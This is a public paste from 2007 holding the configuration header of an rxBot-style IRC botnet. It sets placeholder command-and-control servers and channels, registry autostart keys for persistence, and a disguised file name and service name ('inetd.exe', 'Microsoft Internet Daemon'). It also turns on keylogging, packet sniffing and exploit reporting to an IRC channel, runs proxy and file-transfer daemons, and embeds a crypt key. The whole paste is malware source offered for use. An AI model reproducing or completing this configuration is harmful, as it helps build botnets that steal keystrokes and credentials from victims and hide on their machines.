Public paste
pwned
By: w00t | Date: Dec 5 2007 08:49 | Format: None | Expires: never | Size: 2.82 KB | Hits: 1917

  1. // bot configuration (generic) - doesn't need to be encrypted
  2.  
  3. int port = 7670;                                // server port
  4.  
  5. int port2 = 7670;                               // backup server port
  6.  
  7. int socks4port = 2001;                  // Port # for sock4 daemon to run on  - CHANGE THIS!!!
  8.  
  9. int tftpport = 69;                              // Port # for tftp daemon to run on
  10.  
  11. int httpport = 5678;                    // Port # for http daemon to run on
  12.  
  13. int rloginport = 514;                   // Port # for rlogin daemon to run on
  14.  
  15. BOOL topiccmd = TRUE;                   // set to TRUE to enable topic commands
  16.  
  17. BOOL rndfilename = FALSE;               // use random file name
  18.  
  19. BOOL AutoStart = TRUE;                  // enable autostart registry keys
  20.  
  21. char prefix = '.';                              // command prefix (one character max.)
  22.  
  23. int maxrand = 9;                                // how many random numbers in the nick
  24.  
  25. int nicktype = CONSTNICK;               // nick type (see rndnick.h)
  26.  
  27. BOOL nickprefix = FALSE;                        // nick uptime & mirc prefix
  28.  
  29.  
  30.  
  31. #ifdef DEBUG_LOGGING
  32.  
  33. char logfile[]="%temp%\paste.jpg";
  34.  
  35. #endif
  36.  
  37.  
  38.  
  39. #ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!
  40.  
  41.  
  42.  
  43. #else  // Recommended to use this only for Crypt() setup, this is unsecure.
  44.  
  45.  
  46.  
  47. char botid[] = "rx-asn-2-re-worked ";                                           // bot id
  48.  
  49. char version[] = "Version 3 Mod by ovelayer";           // Bots !version reply
  50.  
  51. char password[] = "";                                   // bot password
  52.  
  53. char server[] = "SERVHIER";             // server
  54.  
  55. char serverpass[] = "";                                         // server password
  56.  
  57. char channel[] = "##fatal";                             // channel that the bot should join
  58.  
  59. char chanpass[] = "";                                           // channel password
  60.  
  61. char server2[] = "SERVHIER";                                            // backup server (optional)
  62.  
  63. char channel2[] = "##fatal";                                            // backup channel (optional)
  64.  
  65. char chanpass2[] = "";                                          // backup channel password (optional)
  66.  
  67. char filename[] = "inetd.exe";                  // destination file name
  68.  
  69. char keylogfile[] = "inetcache";                                // keylog filename
  70.  
  71. char valuename[] = "Microsoft Internet Daemon";         // value name for autostart
  72.  
  73. char nickconst[] = "";                                  // first part to the bot's nick
  74.  
  75. char szLocalPayloadFile[]="inetd.exe";  // Payload filename
  76.  
  77. char modeonconn[] = "-xi+B";                                    // Can be more than one mode and contain both + and -
  78.  
  79. char exploitchan[] = "##fatal";                                 // Channel where exploit messages get redirected
  80.  
  81. char keylogchan[] = "##fatal";                                          // Channel where keylog messages get redirected
  82.  
  83. char psniffchan[] = "##fatal";                                          // Channel where psniff messages get redirected
  84.  
  85.  
  86.  
  87. char *authost[] = {
  88.  
  89.         "*@*.*"
  90.  
  91. };
  92.  
  93.  
  94.  
  95. char *versionlist[] = {
  96.  
  97.         "mIRC v6.12 Khaled Mardam-Bey",
  98.  
  99. };
  100.  
  101.  
  102.  
  103. char regkey1[]="Software\Microsoft\Windows\CurrentVersion\Run";
  104.  
  105. char regkey2[]="Software\Microsoft\Windows\CurrentVersion\RunServices";
  106.  
  107. char regkey3[]="Software\Microsoft\OLE";
  108.  
  109. char regkey4[]="SYSTEM\CurrentControlSet\Control\Lsa";
  110.  
  111.  
  112.  
  113. #endif
  114.  
  115.  
  116.  
  117. #ifdef PLAIN_CRYPT
  118.  
  119. char key[16] = "9jah3msnso23kam2w00tzollol"; // CHANGE THIS!!! hmmm..Do I even need this now?
  120.  
  121. #endif